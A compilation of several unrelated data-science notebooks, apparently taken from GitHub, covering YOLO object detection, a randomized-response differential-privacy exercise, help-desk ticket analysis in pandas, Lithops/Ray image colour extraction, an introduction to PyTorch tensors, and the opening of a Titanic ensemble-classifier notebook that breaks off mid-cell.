yolo_model.summary()
```
**Note**: On some computers, you may see a warning message from Keras. Don't worry about it if you do--it is fine.
**Reminder**: this model converts a preprocessed batch of input images (shape: (m, 608, 608, 3)) into a tensor of shape (m, 19, 19, 5, 85) as explained in Figure (2).
### 3.3 - Convert output of the model to usable bounding box tensors
The output of `yolo_model` is a (m, 19, 19, 5, 85) tensor that needs to pass through non-trivial processing and conversion. The following cell does that for you.
If you are curious about how `yolo_head` is implemented, you can find the function definition in the file ['keras_yolo.py'](https://github.com/allanzelener/YAD2K/blob/master/yad2k/models/keras_yolo.py). The file is located in your workspace in this path 'yad2k/models/keras_yolo.py'.
```
yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))
```
You added `yolo_outputs` to your graph. This set of 4 tensors is ready to be used as input by your `yolo_eval` function.
### 3.4 - Filtering boxes
`yolo_outputs` gave you all the predicted boxes of `yolo_model` in the correct format. You're now ready to perform filtering and select only the best boxes. Let's now call `yolo_eval`, which you had previously implemented, to do this.
```
scores, boxes, classes = yolo_eval(yolo_outputs, image_shape)
```
### 3.5 - Run the graph on an image
Let the fun begin. You have created a graph that can be summarized as follows:
1. <font color='purple'> yolo_model.input </font> is given to `yolo_model`. The model is used to compute the output <font color='purple'> yolo_model.output </font>
2. <font color='purple'> yolo_model.output </font> is processed by `yolo_head`. It gives you <font color='purple'> yolo_outputs </font>
3. <font color='purple'> yolo_outputs </font> goes through a filtering function, `yolo_eval`. It outputs your predictions: <font color='purple'> scores, boxes, classes </font>
**Exercise**: Implement predict() which runs the graph to test YOLO on an image.
You will need to run a TensorFlow session, to have it compute `scores, boxes, classes`.
The code below also uses the following function:
```python
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
```
which outputs:
- image: a python (PIL) representation of your image used for drawing boxes. You won't need to use it.
- image_data: a numpy-array representing the image. This will be the input to the CNN.
**Important note**: when a model uses BatchNorm (as is the case in YOLO), you will need to pass an additional placeholder in the feed_dict {K.learning_phase(): 0}.
#### Hint: Using the TensorFlow Session object
* Recall that above, we called `K.get_session()` and saved the Session object in `sess`.
* To evaluate a list of tensors, we call `sess.run()` like this:
```
sess.run(fetches=[tensor1, tensor2, tensor3],
         feed_dict={yolo_model.input: the_input_variable,
                    K.learning_phase(): 0})
```
* Notice that the variables `scores, boxes, classes` are not passed into the `predict` function, but these are global variables that you will use within the `predict` function.
```
def predict(sess, image_file):
"""
Runs the graph stored in "sess" to predict boxes for "image_file". Prints and plots the predictions.
Arguments:
sess -- your tensorflow/Keras session containing the YOLO graph
image_file -- name of an image stored in the "images" folder.
Returns:
out_scores -- tensor of shape (None, ), scores of the predicted boxes
out_boxes -- tensor of shape (None, 4), coordinates of the predicted boxes
out_classes -- tensor of shape (None, ), class index of the predicted boxes
Note: "None" actually represents the number of predicted boxes, it varies between 0 and max_boxes.
"""
# Preprocess your image
image, image_data = preprocess_image("images/" + image_file, model_image_size = (608, 608))
# Run the session with the correct tensors and choose the correct placeholders in the feed_dict.
# You'll need to use feed_dict={yolo_model.input: ... , K.learning_phase(): 0})
### START CODE HERE ### (≈ 1 line)
out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes], feed_dict={yolo_model.input: image_data,
K.learning_phase(): 0})
### END CODE HERE ###
# Print predictions info
print('Found {} boxes for {}'.format(len(out_boxes), image_file))
# Generate colors for drawing bounding boxes.
colors = generate_colors(class_names)
# Draw bounding boxes on the image file
draw_boxes(image, out_scores, out_boxes, out_classes, class_names, colors)
# Save the predicted bounding box on the image
image.save(os.path.join("out", image_file), quality=90)
# Display the results in the notebook
output_image = scipy.misc.imread(os.path.join("out", image_file))
imshow(output_image)
return out_scores, out_boxes, out_classes
```
Run the following cell on the "test.jpg" image to verify that your function is correct.
```
out_scores, out_boxes, out_classes = predict(sess, "test.jpg")
```
**Expected Output**:
<table>
<tr>
<td>
**Found 7 boxes for test.jpg**
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.60 (925, 285) (1045, 374)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.66 (706, 279) (786, 350)
</td>
</tr>
<tr>
<td>
**bus**
</td>
<td>
0.67 (5, 266) (220, 407)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.70 (947, 324) (1280, 705)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.74 (159, 303) (346, 440)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.80 (761, 282) (942, 412)
</td>
</tr>
<tr>
<td>
**car**
</td>
<td>
0.89 (367, 300) (745, 648)
</td>
</tr>
</table>
The model you've just run is actually able to detect 80 different classes listed in "coco_classes.txt". To test the model on your own images:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the code cell above
4. Run the code and see the output of the algorithm!
If you were to run your session in a for loop over all your images, here's what you would get:
<center>
<video width="400" height="200" src="nb_images/pred_video_compressed2.mp4" type="video/mp4" controls>
</video>
</center>
<caption><center> Predictions of the YOLO model on pictures taken from a camera while driving around the Silicon Valley <br> Thanks [drive.ai](https://www.drive.ai/) for providing this dataset! </center></caption>
## <font color='darkblue'>What you should remember:
- YOLO is a state-of-the-art object detection model that is fast and accurate
- It runs an input image through a CNN which outputs a 19x19x5x85 dimensional volume.
- The encoding can be seen as a grid where each of the 19x19 cells contains information about 5 boxes.
- You filter through all the boxes using non-max suppression. Specifically:
- Score thresholding on the probability of detecting a class to keep only accurate (high probability) boxes
- Intersection over Union (IoU) thresholding to eliminate overlapping boxes
- Because training a YOLO model from randomly initialized weights is non-trivial and requires a large dataset as well as a lot of computation, we used previously trained model parameters in this exercise. If you wish, you can also try fine-tuning the YOLO model with your own dataset, though this would be a fairly non-trivial exercise.
**References**: The ideas presented in this notebook came primarily from the two YOLO papers. The implementation here also took significant inspiration and used many components from Allan Zelener's GitHub repository. The pre-trained weights used in this exercise came from the official YOLO website.
- Joseph Redmon, Santosh Divvala, Ross Girshick, Ali Farhadi - [You Only Look Once: Unified, Real-Time Object Detection](https://arxiv.org/abs/1506.02640) (2015)
- Joseph Redmon, Ali Farhadi - [YOLO9000: Better, Faster, Stronger](https://arxiv.org/abs/1612.08242) (2016)
- Allan Zelener - [YAD2K: Yet Another Darknet 2 Keras](https://github.com/allanzelener/YAD2K)
- The official YOLO website (https://pjreddie.com/darknet/yolo/)
**Car detection dataset**:
<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" property="dct:title">The Drive.ai Sample Dataset</span> (provided by drive.ai) is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>. We are grateful to Brody Huval, Chih Hu and Rahul Patel for providing this data.
# Exercise 2
This second exercise takes place in a `code` cell where you have to write a few lines of Python! No worries, though: we will get there step by step.
Below this text block you will find three blocks for the three levels of the exercise.
We will look into *Differential Privacy* and do a few exercises on it.
## 1. Knowledge
In this first part you will find a small function that takes as input whether you are an offender, and outputs an answer protected by *Differential Privacy*.
If you run the code, it will print a few answers for different inputs.
You can run the block several times, and it should show different results almost every time.
```
# Exercice 2 - Partie 1
import random
# Returns True or False for a coin toss. The random.choice method chooses randomly between
# the two values. Think of "True" as "Tail", and "False" as "Head"
def coin() -> bool:
return random.choice([True, False])
# Differential Privacy 1 - takes a variable as input that indicates if the real value is guilty or
# not. Then it uses DP to decide whether it should output the real value, or a made-up guilt.
def dp_1(guilty: bool) -> bool:
if coin():
return guilty
else:
return coin()
# A pretty-printing method that shows nicely what is going on.
def print_guilty(guilty: bool) -> str:
if guilty:
print("Is guilty")
else:
print("Is innocent")
# Two outputs for a guilty and an innocent person:
print_guilty(dp_1(True))
print_guilty(dp_1(False))
```
## 2. Comprehension
### Random generators
Why do you get different results *almost* every time you run the block repeatedly?
### Expected value
We will try to find the expected value of our function depending on whether the person is innocent or not. Instead of working it out mathematically, we will do it by trial and counting, plus a bit of common sense...
In the `Exercice 2 - Partie 2` block, add the following line 10 times:
print_guilty(dp_1(True))
then run the block.
- How many times do you get `guilty`, how many times `innocent`?
- So what is the expected value if we set `guilty` to `1` and `innocent` to `0`?
- The same question, but with `print_guilty(dp_1(False))`
### Correcting for DP
- Suppose only one person is guilty - how many guilty people will we find on average?
- Knowing the expected value of `dp_1(False)`, how can we compute the probable number of guilty people?
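One way to sanity-check these questions numerically is to call `dp_1` many times and average the answers; `coin` and `dp_1` are restated here so the sketch runs on its own:

```python
import random

random.seed(42)  # fixed seed so the experiment is reproducible

def coin() -> bool:
    return random.choice([True, False])

def dp_1(guilty: bool) -> bool:
    return guilty if coin() else coin()

n = 100_000
e_true = sum(dp_1(True) for _ in range(n)) / n    # empirically close to 0.75
e_false = sum(dp_1(False) for _ in range(n)) / n  # empirically close to 0.25
print(e_true, e_false)
```

So if a fraction `f` of the `n` answers comes back guilty, a corrected estimate of the number of truly guilty people is `(f - 0.25) / 0.5 * n`.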
```
# Exercice 2 - Partie 2
```
## 3. Application
If you know a bit of programming, we can do the computations somewhat more rigorously.
### Create a large number of measurements
The first method, `create_measures`, replaces our line-by-line calls to `dp_1`.
The parameter `p_guilty` gives the probability, between 0 and 1, that an element is guilty.
### Compute the number of guilty people
The second method, `calculate_guilty`, takes the output of `create_measures` and computes the probable
number of guilty people.
First count the number of `True` values in the input, then relate it to the total number
of answers.
Then correct for the error introduced by DP.
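If you get stuck, here is one possible sketch of the two methods (`coin` and `dp_1` are restated so the cell is self-contained); try your own version first:

```python
import random

random.seed(1)

def coin() -> bool:
    return random.choice([True, False])

def dp_1(guilty: bool) -> bool:
    return guilty if coin() else coin()

def create_measures(throws: int, p_guilty: float) -> [bool]:
    # each throw comes from a guilty person with probability p_guilty
    return [dp_1(random.random() < p_guilty) for _ in range(throws)]

def calculate_guilty(results: [bool]) -> float:
    # E[answer] = 0.5 * p_guilty + 0.25, so p_guilty = 2 * fraction - 0.5
    fraction = sum(results) / len(results)
    return (2 * fraction - 0.5) * len(results)

print(calculate_guilty(create_measures(100_000, 0.1)))  # close to 10_000
```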
```
# Exercice 2 - Partie 3
# This method returns a number of throws where each throw is randomly chosen to be
# from a guilty person with probability p_guilty.
# The return value should be an array of booleans.
def create_measures(throws: int, p_guilty: float) -> [bool]:
pass
# Returns the most probable number of guilty persons given the array of results.
def calculate_guilty(results: [bool]) -> float:
pass
# This should print a number close to 0.1 * 100 = 10 guilty persons.
print(f'The number of guilty persons are: {calculate_guilty(create_measures(100, 0.1))}')
```
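One possible solution sketch, under the assumption that `dp_1` is the classic randomized-response mechanism (truthful with probability 1/2, otherwise a fair coin), so a guilty person answers `True` with probability 0.75 and an innocent one with 0.25. Adjust the constants if your `dp_1` uses different probabilities.

```python
import random

# Assumed randomized-response mechanism; substitute the notebook's own dp_1.
def dp_1(guilty: bool) -> bool:
    if random.random() < 0.5:
        return guilty
    return random.random() < 0.5

def create_measures(throws: int, p_guilty: float) -> list:
    # Each throw comes from a guilty person with probability p_guilty
    return [dp_1(random.random() < p_guilty) for _ in range(throws)]

def calculate_guilty(results: list) -> float:
    frac_true = sum(results) / len(results)
    # Invert E[answer] = 0.25 + 0.5 * p_guilty to undo the DP noise
    p_guilty = (frac_true - 0.25) / 0.5
    return p_guilty * len(results)

print(f'The number of guilty persons are: {calculate_guilty(create_measures(100, 0.1))}')
```

With only 100 throws the estimate is noisy and can even come out negative; it concentrates around the true count as the number of throws grows.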
|
github_jupyter
|
```
import pandas as pd
fh = '../files/tickets-gen-all.csv'
df = pd.read_csv(fh, index_col=0, parse_dates=['created', 'opened_at', 'updated_on', 'resolved'])
df.shape
df.columns
```
##### cataloging active tickets only
```
cadf = df[((df['category'] == 'Cataloging') | (df['assignment_group'] == 'BKOPS CAT')) & ((df['state'] != 'Closed') & (df['state'] != 'Resolved'))]
```
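The same filter can be written more compactly with `Series.isin`. The frame below is synthetic (the rows are made up; only the column names mirror the ticket data) just to show the idiom:

```python
import pandas as pd

# Tiny synthetic frame for illustration -- not real ticket data
demo = pd.DataFrame({
    'category': ['Cataloging', 'Circulation', 'Cataloging'],
    'assignment_group': ['BKOPS CAT', 'BKOPS CAT', 'OTHER'],
    'state': ['Active', 'Closed', 'Resolved'],
})
# ~isin(...) replaces the chained "!= 'Closed'" and "!= 'Resolved'" comparisons
mask = ((demo['category'] == 'Cataloging') | (demo['assignment_group'] == 'BKOPS CAT')) \
       & ~demo['state'].isin(['Closed', 'Resolved'])
print(demo[mask].shape[0])  # prints 1: only the 'Active' row survives
```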
## Cataloging tickets requiring category change (diff dept)
```
df['category'].unique()
df['assignment_group'].unique()
cat_change_df = df[(df['category'] == 'Cataloging') & ((df['assignment_group'] != 'BKOPS CAT') & (df['assignment_group'].notnull()))]
cat_change_df.shape[0]
cat_change_df_active = cat_change_df[(cat_change_df['state'] != 'Closed') & (cat_change_df['state'] != 'Resolved')]
print(f'# of tickets: {cat_change_df_active.shape[0]}')
```
## Awaiting User & Vendor tickets
```
awaiting_df = cadf[((cadf['state'] == 'Awaiting Vendor') | (cadf['state'] == 'Awaiting User Info')) & (cadf['created'] < '2020-01-01')]
awaiting_df['state'].unique()
print(f'# of tickets: {awaiting_df.shape[0]}')
```
### NEW tickets backlog (older than mid February 2020)
```
new_backlog_df = cadf[(cadf['state'] == 'New') & (cadf['assigned_to'].isnull())]
new_backlog_df.shape[0]
for lib, ldf in new_backlog_df.groupby('system'):
print(lib, f'# of tickets: {ldf.shape[0]}')
```
## Active CAT tickets
```
years = [2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020]
caadf = cadf[cadf['state'] == 'Active']
# DataFrame.append was removed in pandas 2.0, so accumulate rows in a list
# and build each DataFrame in one step
for lib, ldf in caadf.groupby('system'):
    rows = []
    for staff, sdf in ldf.groupby('assigned_to'):
        counts = sdf.groupby(sdf['created'].map(lambda x: x.year)).size()
        for y in years:
            rows.append({'staff': staff, 'year': y, 'tickets': int(counts.get(y, 0))})
    staff_df = pd.DataFrame(rows, columns=['staff', 'year', 'tickets'])
    staff_df.to_csv(f'../data-display/{lib}-active-tickets-by-staff.csv', index=False)
```
#### active by library per year
```
# Accumulate rows in a list, then build the DataFrame in one step
rows = []
for lib, ldf in caadf.groupby('system'):
    counts = ldf.groupby(ldf['created'].map(lambda x: x.year)).size()
    for y in years:
        rows.append({'library': lib, 'year': y, 'tickets': int(counts.get(y, 0))})
lib_out_df = pd.DataFrame(rows, columns=['library', 'year', 'tickets'])
lib_out_df.to_csv('../data-display/cat-active-tickets-per-lib-timeline.csv', index=False)
```
#### Active categories
```
rows = []
for cat, cdf in caadf.groupby('subcategory'):
    print(cat, cdf.shape[0])
    rows.append({'subcategory': cat, 'tickets': cdf.shape[0]})
cat_out_df = pd.DataFrame(rows, columns=['subcategory', 'tickets'])
cat_out_df.head()
cat_out_df.to_csv('../data-display/cat-active-by-category.csv', index=False)
for lib, ldf in caadf.groupby('system'):
    rows = [{'category': cat, 'tickets': cdf.shape[0]}
            for cat, cdf in ldf.groupby('subcategory')]
    lib_out_df = pd.DataFrame(rows, columns=['category', 'tickets'])
    lib_out_df.to_csv(f'../data-display/{lib}-active-tickets-by-category.csv', index=False)
```
|
github_jupyter
|
# Color extraction from images with Lithops4Ray
In this tutorial we explain how to use Lithops4Ray to extract colors and the [HSV](https://en.wikipedia.org/wiki/HSL_and_HSV) color range from images persisted in IBM Cloud Object Storage. To experiment with this tutorial, you can use any public image dataset and upload it to your bucket in IBM Cloud Object Storage; for example, follow the [Stanford Dogs Dataset](http://vision.stanford.edu/aditya86/ImageNetDogs/) link to download images. We also provide an upload [script](https://github.com/project-codeflare/data-integration/blob/main/scripts/upload_to_ibm_cos.py) that can be used to upload local images to IBM Cloud Object Storage.
Our code uses the colorthief package, which needs to be installed in the Ray cluster, both on the head and worker nodes. You can edit the `cluster.yaml` file and add
`- pip install colorthief`
to the `setup_commands` section. This ensures that the required package is installed automatically once the Ray cluster is started.
```
import lithops
import ray
```
We write a function that extracts the dominant color from a single image. Once invoked, the Lithops framework injects a reserved parameter `obj` that points to the data stream of the image. More information on the reserved `obj` parameter can be found [here](https://github.com/lithops-cloud/lithops/blob/master/docs/data_processing.md#processing-data-from-a-cloud-object-storage-service).
```
def extract_color(obj):
from colorthief import ColorThief
body = obj.data_stream
dominant_color = ColorThief(body).get_color(quality=10)
return dominant_color, obj.key
```
We now write a Ray task that returns the image name and the HSV color range of the image. Instead of calling the `extract_color` function directly, Lithops is used behind the scenes (through the data object) to call it only at the right moment.
```
@ray.remote
def identify_colorspace(data):
import colorsys
color, name = data.result()
hsv = colorsys.rgb_to_hsv(color[0], color[1], color[2])
val = hsv[0] * 180
return name, val
```
Now let's tie it all together with a main method. Using Lithops removes all the boilerplate code required to list data from object storage. Lithops also inspects the data source with its internal data partitioner and creates a lazy execution plan in which each entry maps an `extract_color` call to a single image. Moreover, Lithops creates a single authentication token that is used by all the tasks, instead of letting each task perform authentication. Parallelism is controlled by Ray: once a Ray task executes, it calls Lithops to run `extract_color` directly in the context of the calling task. Thus Lithops lets code access object storage data without requiring additional coding effort from the user.
```
if __name__ == '__main__':
ray.init(ignore_reinit_error=True)
fexec = lithops.LocalhostExecutor(log_level=None)
my_data = fexec.map(extract_color, 'cos://<bucket>/<path to images>/')
results = [identify_colorspace.remote(d) for d in my_data]
for res in results:
value = ray.get(res)
print("Image: " + value[0] + ", dominant color HSV range: " + str(value[1]))
ray.shutdown()
```
|
github_jupyter
|
# Introduction to Deep Learning with PyTorch
In this notebook, you'll get introduced to [PyTorch](http://pytorch.org/), a framework for building and training neural networks. PyTorch in a lot of ways behaves like the arrays you love from Numpy. These Numpy arrays, after all, are just tensors. PyTorch takes these tensors and makes it simple to move them to GPUs for the faster processing needed when training neural networks. It also provides a module that automatically calculates gradients (for backpropagation!) and another module specifically for building neural networks. All together, PyTorch ends up being more coherent with Python and the Numpy/Scipy stack compared to TensorFlow and other frameworks.
## Neural Networks
Deep Learning is based on artificial neural networks which have been around in some form since the late 1950s. The networks are built from individual parts approximating neurons, typically called units or simply "neurons." Each unit has some number of weighted inputs. These weighted inputs are summed together (a linear combination) then passed through an activation function to get the unit's output.
<img src="assets/simple_neuron.png" width=400px>
Mathematically this looks like:
$$
\begin{align}
y &= f(w_1 x_1 + w_2 x_2 + b) \\
y &= f\left(\sum_i w_i x_i +b \right)
\end{align}
$$
With vectors this is the dot/inner product of two vectors:
$$
h = \begin{bmatrix}
x_1 \, x_2 \cdots x_n
\end{bmatrix}
\cdot
\begin{bmatrix}
w_1 \\
w_2 \\
\vdots \\
w_n
\end{bmatrix}
$$
## Tensors
It turns out neural network computations are just a bunch of linear algebra operations on *tensors*, a generalization of matrices. A vector is a 1-dimensional tensor, a matrix is a 2-dimensional tensor, an array with three indices is a 3-dimensional tensor (RGB color images for example). The fundamental data structure for neural networks are tensors and PyTorch (as well as pretty much every other deep learning framework) is built around tensors.
<img src="assets/tensor_examples.svg" width=600px>
With the basics covered, it's time to explore how we can use PyTorch to build a simple neural network.
```
# First, import PyTorch
import torch
def activation(x):
""" Sigmoid activation function
Arguments
---------
x: torch.Tensor
"""
return 1/(1+torch.exp(-x))
### Generate some data
torch.manual_seed(7) # Set the random seed so things are predictable
# Features are 5 random normal variables
features = torch.randn((1, 5))
# True weights for our data, random normal variables again
weights = torch.randn_like(features)
# and a true bias term
bias = torch.randn((1, 1))
```
Above I generated data we can use to get the output of our simple network. This is all just random for now, going forward we'll start using normal data. Going through each relevant line:
`features = torch.randn((1, 5))` creates a tensor with shape `(1, 5)`, one row and five columns, that contains values randomly distributed according to the normal distribution with a mean of zero and standard deviation of one.
`weights = torch.randn_like(features)` creates another tensor with the same shape as `features`, again containing values from a normal distribution.
Finally, `bias = torch.randn((1, 1))` creates a single value from a normal distribution.
PyTorch tensors can be added, multiplied, subtracted, etc, just like Numpy arrays. In general, you'll use PyTorch tensors pretty much the same way you'd use Numpy arrays. They come with some nice benefits though such as GPU acceleration which we'll get to later. For now, use the generated data to calculate the output of this simple single layer network.
> **Exercise**: Calculate the output of the network with input features `features`, weights `weights`, and bias `bias`. Similar to Numpy, PyTorch has a [`torch.sum()`](https://pytorch.org/docs/stable/torch.html#torch.sum) function, as well as a `.sum()` method on tensors, for taking sums. Use the function `activation` defined above as the activation function.
```
## Calculate the output of this network using the weights and bias tensors
y_hat = activation(torch.sum(features * weights) + bias)
print(y_hat)
```
You can do the multiplication and sum in the same operation using a matrix multiplication. In general, you'll want to use matrix multiplications since they are more efficient and accelerated using modern libraries and high-performance computing on GPUs.
Here, we want to do a matrix multiplication of the features and the weights. For this we can use [`torch.mm()`](https://pytorch.org/docs/stable/torch.html#torch.mm) or [`torch.matmul()`](https://pytorch.org/docs/stable/torch.html#torch.matmul) which is somewhat more complicated and supports broadcasting. If we try to do it with `features` and `weights` as they are, we'll get an error
```python
>> torch.mm(features, weights)
---------------------------------------------------------------------------
RuntimeError Traceback (most recent call last)
<ipython-input-13-15d592eb5279> in <module>()
----> 1 torch.mm(features, weights)
RuntimeError: size mismatch, m1: [1 x 5], m2: [1 x 5] at /Users/soumith/minicondabuild3/conda-bld/pytorch_1524590658547/work/aten/src/TH/generic/THTensorMath.c:2033
```
As you're building neural networks in any framework, you'll see this often. Really often. What's happening here is our tensors aren't the correct shapes to perform a matrix multiplication. Remember that for matrix multiplications, the number of columns in the first tensor must equal the number of rows in the second tensor. Both `features` and `weights` have the same shape, `(1, 5)`. This means we need to change the shape of `weights` to get the matrix multiplication to work.
**Note:** To see the shape of a tensor called `tensor`, use `tensor.shape`. If you're building neural networks, you'll be using this method often.
There are a few options here: [`weights.reshape()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.reshape), [`weights.resize_()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.resize_), and [`weights.view()`](https://pytorch.org/docs/stable/tensors.html#torch.Tensor.view).
* `weights.reshape(a, b)` will return a tensor with the same data as `weights` and size `(a, b)`; sometimes this is a view of the original tensor, and sometimes a clone, as in it copies the data to another part of memory.
* `weights.resize_(a, b)` returns the same tensor with a different shape. However, if the new shape results in fewer elements than the original tensor, some elements will be removed from the tensor (but not from memory). If the new shape results in more elements than the original tensor, new elements will be uninitialized in memory. Here I should note that the underscore at the end of the method denotes that this method is performed **in-place**. Here is a great forum thread to [read more about in-place operations](https://discuss.pytorch.org/t/what-is-in-place-operation/16244) in PyTorch.
* `weights.view(a, b)` will return a new tensor with the same data as `weights` with size `(a, b)`.
I usually use `.view()`, but any of the three methods will work for this. So, now we can reshape `weights` to have five rows and one column with something like `weights.view(5, 1)`.
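A quick sanity check of the shapes discussed above (a minimal sketch; the tensor here is freshly created, not the one from the cells above):

```python
import torch

# All three options turn a (1, 5) tensor into a (5, 1) tensor
weights = torch.randn((1, 5))
print(weights.view(5, 1).shape)     # torch.Size([5, 1])
print(weights.reshape(5, 1).shape)  # torch.Size([5, 1])
# resize_ mutates in place (note the trailing underscore), so work on a clone
w = weights.clone()
w.resize_(5, 1)
print(w.shape)                      # torch.Size([5, 1])
```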
> **Exercise**: Calculate the output of our little network using matrix multiplication.
```
## Calculate the output of this network using matrix multiplication
y_hat = activation(torch.mm(features, weights.view(5, 1)) + bias)
print(y_hat)
```
### Stack them up!
That's how you can calculate the output for a single neuron. The real power of this algorithm happens when you start stacking these individual units into layers and stacks of layers, into a network of neurons. The output of one layer of neurons becomes the input for the next layer. With multiple input units and output units, we now need to express the weights as a matrix.
<img src='assets/multilayer_diagram_weights.png' width=450px>
The first layer shown on the bottom here are the inputs, understandably called the **input layer**. The middle layer is called the **hidden layer**, and the final layer (on the right) is the **output layer**. We can express this network mathematically with matrices again and use matrix multiplication to get linear combinations for each unit in one operation. For example, the hidden layer ($h_1$ and $h_2$ here) can be calculated
$$
\vec{h} = [h_1 \, h_2] =
\begin{bmatrix}
x_1 \, x_2 \cdots \, x_n
\end{bmatrix}
\cdot
\begin{bmatrix}
w_{11} & w_{12} \\
w_{21} &w_{22} \\
\vdots &\vdots \\
w_{n1} &w_{n2}
\end{bmatrix}
$$
The output for this small network is found by treating the hidden layer as inputs for the output unit. The network output is expressed simply
$$
y = f_2 \! \left(\, f_1 \! \left(\vec{x} \, \mathbf{W_1}\right) \mathbf{W_2} \right)
$$
```
### Generate some data
torch.manual_seed(7) # Set the random seed so things are predictable
# Features are 3 random normal variables
features = torch.randn((1, 3))
# Define the size of each layer in our network
n_input = features.shape[1] # Number of input units, must match number of input features
n_hidden = 2 # Number of hidden units
n_output = 1 # Number of output units
# Weights for inputs to hidden layer
W1 = torch.randn(n_input, n_hidden)
# Weights for hidden layer to output layer
W2 = torch.randn(n_hidden, n_output)
# and bias terms for hidden and output layers
B1 = torch.randn((1, n_hidden))
B2 = torch.randn((1, n_output))
```
> **Exercise:** Calculate the output for this multi-layer network using the weights `W1` & `W2`, and the biases, `B1` & `B2`.
```
## Your solution here
y_hat = activation(torch.mm(activation(torch.mm(features, W1) + B1), W2) + B2)
print(y_hat)
```
If you did this correctly, you should see the output `tensor([[ 0.3171]])`.
The number of hidden units is a parameter of the network, often called a **hyperparameter** to differentiate it from the weights and biases parameters. As you'll see later when we discuss training a neural network, the more hidden units a network has, and the more layers, the better able it is to learn from data and make accurate predictions.
## Numpy to Torch and back
Special bonus section! PyTorch has a great feature for converting between Numpy arrays and Torch tensors. To create a tensor from a Numpy array, use `torch.from_numpy()`. To convert a tensor to a Numpy array, use the `.numpy()` method.
```
import numpy as np
a = np.random.rand(4,3)
a
b = torch.from_numpy(a)
b
b.numpy()
```
The memory is shared between the Numpy array and Torch tensor, so if you change the values in-place of one object, the other will change as well.
```
# Multiply PyTorch Tensor by 2, in place
b.mul_(2)
# Numpy array matches new values from Tensor
a
```
|
github_jupyter
|
<h1><center>CS 455/595a: Ensemble Methods - bagging and random forests</center></h1>
<center>Richard S. Stansbury</center>
This notebook applies the bagging and random forest ensemble classification and regression concepts covered in [1] to the [Titanic](https://www.kaggle.com/c/titanic/) and [Boston Housing](https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_boston.html) data sets for DT-based classification and regression, respectively.
Note: you must install the graphviz package for Python. Please do this install using pip or conda, e.g. "conda install graphviz".
Reference:
[1] Aurélien Géron. *Hands-On Machine Learning with Scikit-Learn & TensorFlow*. O'Reilly Media Inc., 2017.
[2] Aurélien Géron. "ageron/handson-ml: A series of Jupyter notebooks that walk you through the fundamentals of Machine Learning and Deep Learning in python using Scikit-Learn and TensorFlow." Github.com, online at: https://github.com/ageron/handson-ml [last accessed 2019-03-01]
**Table of Contents**
1. [Titanic Survivor Ensemble Classifiers](#Titanic-Survivor-Classifier)
2. [Boston Housing Cost Ensemble Regressors](#Boston-Housing-Cost-Estimator)
# Titanic Survivor Classifier
## Set up - Imports of libraries and Data Preparation
```
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.impute import SimpleImputer
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix, precision_score, recall_score, accuracy_score, f1_score
from sklearn.metrics import mean_squared_error, mean_absolute_error
from sklearn.model_selection import cross_val_predict
from sklearn import datasets
from matplotlib import pyplot as plt
%matplotlib inline
import numpy as np
import pandas as pd
import os
# Read data from input files into Pandas data frames
data_path = os.path.join("datasets","titanic")
train_filename = "train.csv"
test_filename = "test.csv"
def read_csv(data_path, filename):
joined_path = os.path.join(data_path, filename)
return pd.read_csv(joined_path)
# Read CSV file into Pandas Dataframes
train_df = read_csv(data_path, train_filename)
# Defining Data Pre-Processing Pipelines
class DataFrameSelector(BaseEstimator, TransformerMixin):
def __init__(self, attributes):
self.attributes = attributes
def fit(self, X, y=None):
return self
def transform(self, X):
return X[self.attributes]
class MostFrequentImputer(BaseEstimator, TransformerMixin):
def fit(self, X, y=None):
self.most_frequent = pd.Series([X[c].value_counts().index[0] for c in X],
index = X.columns)
return self
def transform(self, X):
return X.fillna(self.most_frequent)
numeric_pipe = Pipeline([
("Select", DataFrameSelector(["Age", "Fare", "SibSp", "Parch"])), # Selects Fields from dataframe
("Imputer", SimpleImputer(strategy="median")), # Fills in NaN w/ median value for its column
])
#Handle categorical string for sex by encoding as female true, 1 or false,0
train_df['Female'] = train_df["Sex"].apply(lambda x: 1 if x == 'female' else 0)
categories_pipe = Pipeline([
("Select", DataFrameSelector(["Pclass", "Female"])), # Selects Fields from dataframe
("MostFreqImp", MostFrequentImputer()), # Fill in NaN with most frequent
])
preprocessing_pipe = FeatureUnion(transformer_list = [
("numeric pipeline", numeric_pipe),
("categories pipeline", categories_pipe)
])
# Process Input Data Using Pipelines
train_X_data = preprocessing_pipe.fit_transform(train_df)
train_y_data = train_df["Survived"]
feature_names = ["Age", "Fare", "SibSp", "Parch", "Class", "Female"]
target_names = ["Died","Survived"]
```
## KNN Classifier Performance vs. Metrics (for comparison)
This example is included for comparison, showing the cross-validation metric scores for a KNN classifier on the Titanic data set.
```
from sklearn.neighbors import KNeighborsClassifier
# KNN Classifier 5-fold cross validation
k=10
clf = KNeighborsClassifier(n_neighbors=k)
y_pred = cross_val_predict(clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Precision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Bagging Example with KNN
This example implements a bagging classifier of 500 KNN classifiers with K=2. It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.
```
from sklearn.ensemble import BaggingClassifier
k=2
